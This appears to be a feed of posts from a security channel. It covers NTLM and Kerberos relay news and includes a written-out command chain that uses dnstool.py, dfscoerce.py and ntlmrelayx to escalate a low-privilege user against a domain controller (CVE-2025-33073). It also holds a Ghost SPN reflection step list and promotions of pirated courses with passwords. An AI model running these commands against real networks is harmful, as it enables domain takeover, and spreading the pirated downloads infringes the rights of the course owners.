All Security Engineering Courses

Hello everyone! We have more news about NTLM Relay! We've told the world so many times... Never mind :) So, let's start with the sources: 1. In Win11, the Printerbug-vulnerable service now runs over TCP rather than named pipes (ncacn_np), so a POC has been created that connects to the service over ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main 2. A service vulnerable to PetitPotam may not work by default, but we can try to enable it, for example, using the efsr_spray.py module (https://github.com/Pennyw0rth/NetExec/pull/718). A similar trick, but this time interacting with the required named pipe to enable Remote Registry, can be used like this: echo start > \\.\pipe\winreg . All of these enablement methods are combined under a single, larger mechanism called Service Triggers, a detailed analysis of which was published by our colleagues at TrustedSec (https://trustedsec.com/blog/theres-more-than-one-way-to-trigger-a-windows-service). Then came some wonderful news: rainbow tables for NetNTLMv1 were released (https://console.cloud.google.com/storage/browser/net-ntlmv1-tables;tab=objects?pli=1&prefix=&forceOnObjectsSortingFiltering=false). Even if it's in 2025 :) But the most curious trick I saw today on Twitter was this one. A bug called the Kerberos Reflection Attack was released this year. In short, the system receives a TGS ticket for one device, passes it on to the attacker, and they, in turn, use it without any problems. We can exploit this CVE-2025-33073 with NTLM, for example, to bypass a signature! It's done like this: # We attack a computer named DC dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP> dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip> ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs

#Exclusive 🔥 #First_Time_Ever 🔥 Udemy Course – Malware Development for Ethical Hackers & Pentesters🔥🆕 👨‍💻 Password : @WickHelps ❤️ Exam Guide : link ❗️ Backup all channels Link 🔮 Any-Issues: Chat Here 🖥 Download Here1 Here2

#Exclusive 🔥 #First_Time_Ever 🔥 CyberWarFare Labs - Certified Exploit Development Professional [CEDP] 2025.6 🔥🆕 👨‍💻 Password : @WickHelps ❤️ Exam Guide : link ❗️ Backup all channels Link 🔮 Any-Issues: Chat Here 🖥 Download Here1 Here2

#Exclusive 🔥 #First_Time_Ever 🔥 Course SEC510 Cloud Security Controls and Mitigations🔥🆕 👨‍💻 Password : @WickHelps ❤️ Exam Guide : link ❗️ Backup all channels Link 🔮 Any-Issues: Chat Here 🖥 Download Here1 Here2

UnderlayCopy PowerShell toolkit that extracts locked Windows files (SAM, SYSTEM, NTDS, ...) using MFT parsing and raw disk reads.

Exploiting Ghost SPNs and Kerberos Reflection for SMB Server Privilege Elevation In an attack exploiting CVE‑2025‑58726, a bad actor would perform the following steps: • Identify a Ghost SPN on the target machine. • Register a DNS record for the Ghost SPN pointing to the attacker machine. • Use a Kerberos relay tool (e.g., my KrbRelayEx script, available on GitHub) to intercept the Kerberos authentication. • Trigger authentication for the target machine (e.g., using Printer Bug, PetitPotam, or similar). • Relay the Kerberos ticket back to the target machine. • Gain SYSTEM access via SMB and execute arbitrary commands. P.S.

This attack targets Kerberos by abusing misconfigured SPNs; it does not affect NTLM. The fix for CVE-2025-33073 (Windows SMB Client Elevation of Privilege Vulnerability) addressed a specific SMB client issue. However, the Ghost SPN attack method bypasses that fix. The vulnerability lies in Kerberos itself, which fails to prevent authentication reflection. The same approach can be applied to other protocols that rely on Kerberos.

INE_Incident_Handling_&_Response_Professional🔥🆕 👨‍💻 Password : @WickHelps 👍 Exam Guide : link ❗️ Backup all channels link 👨‍💻 Proof of work Link 🚀 Any-Issues: Chat Here 🖥 Download Here1 Here2

𝗘𝗫𝗣𝗟𝗢𝗜𝗧 𝗗𝗘𝗩𝗘𝗟𝗢𝗣𝗠𝗘𝗡𝗧 🐌 🔗 Part 1 : Intro :- https://0xninjacyclone.github.io/posts/exploitdev_1_intro/ 🔗 Part 2 : Understanding Stack Memory :- https://0xninjacyclone.github.io/posts/exploitdev_2_stack/ 🔗 Part 3 : Understanding Heap Memory :- https://0xninjacyclone.github.io/posts/exploitdev_3_heap/ 🔗 Part 4 : Understanding Binary Files :- https://0xninjacyclone.github.io/posts/exploitdev_4_binfiles/ 🔗 Part 5 : Dealing with Windows PE files programmatically :- https://0xninjacyclone.github.io/posts/exploitdev_5_winpe/ 🔗 Part 6 : Dealing with ELF files programmatically :- https://0xninjacyclone.github.io/posts/exploitdev_6_elf/ 🔗 Part 7 : How to do magic with string format bugs :- https://0xninjacyclone.github.io/posts/exploitdev_7_strfmt/ 🔗 Part 8 : Buffer Over-Read Attacks and Developing a Real Exploit :- https://0xninjacyclone.github.io/posts/exploitdev_8_bor/ @BlueTeamKit #exploit_development #binary_exploitation #vulnerability_research #buffer_overread

☠️ Kubernetes for Pentesters ☠️ A selection of articles on practical Kubernetes penetration testing: 👉 Kubernetes for Pentesters: Part 1 👉 A Pentester’s Approach to Kubernetes Security — Part 1 👉 A Pentester’s Approach to Kubernetes Security — Part 2 #red_team #kubernetes